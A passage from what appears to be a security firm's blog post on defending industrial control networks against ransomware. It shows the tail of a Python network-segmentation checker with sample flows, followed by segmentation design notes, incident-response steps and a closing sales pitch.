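    ("10.1.0.10", "10.10.1.20", "TCP", 3389),      # jump host to engineering workstation
    ("10.0.5.20", "10.10.1.20", "TCP", 3389),      # enterprise laptop straight to the workstation
    ("10.10.1.30", "10.10.1.5", "TCP", 502),       # HMI to PLC inside the control zone
    ("10.10.1.30", "203.0.113.50", "TCP", 443),    # HMI reaching the Internet
    ("203.0.113.3", "10.0.0.40", "TCP", 3389),     # RDP from the VPN egress range
    ("192.0.2.77", "10.0.0.40", "TCP", 3389),      # RDP from an arbitrary Internet host
    ("198.51.100.7", "10.0.0.40", "TCP", 443),     # Tor exit node
]

if __name__ == "__main__":
    for (src, dst, proto, dport), why in check_flows(FLOWS):
        print(f"REJECT {src} -> {dst} {proto}/{dport}: {why}")
```

Two design choices are worth noting. The industrial-protocol rule runs before the jump-host exception, so an administrator on the jump host can reach an engineering workstation over RDP but cannot speak Modbus to a PLC from outside the control zone; engineering changes go through the workstation, where they are logged. And the control zone has no Internet path at all, which is the single most effective way to keep a ransomware operator who has landed in IT from pivoting into OT.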

Worst Case Scenario

If the worst should come to pass, have an emergency plan to protect the rest of your organization and mitigate damage from attackers.

  • Isolate infected systems – immediately identify infected devices and disconnect them from the network. Power them down only if you cannot disconnect them, since powering off destroys volatile evidence needed for the investigation.
  • Contain unaffected devices – if the affected network cannot be taken offline quickly, power down and segregate unaffected systems that share a network with infected ones so that the ransomware cannot spread to them.
  • Secure your backups – your backups are your last line of defense. Make sure they are offline and secure; scan to ensure they have not been compromised by attackers.

In the hours after a data breach is discovered, an organization’s actions are critical. For more preparation and emergency response strategy, see our blog post: How to Survive a Data Breach: 14 Disaster Response Tips.

Harden Your Organization

While it appears that Colonial Pipeline made several mistakes leading up to the recent ransomware attack, the company did one thing right: it reacted quickly by taking critical systems offline and partnering with a third-party firm to investigate the incident and prevent future attacks.

Moving forward, critical infrastructure operators cannot afford to ignore the threat of ransomware. As cyber actors advance, your organization is a target. With years of ICS expertise trusted by the U.S. security community – including DoD, DHS and U.S. Cyber Command – Securicon can harden you against today’s risks and prepare you for tomorrow’s threats. Contact us to learn more.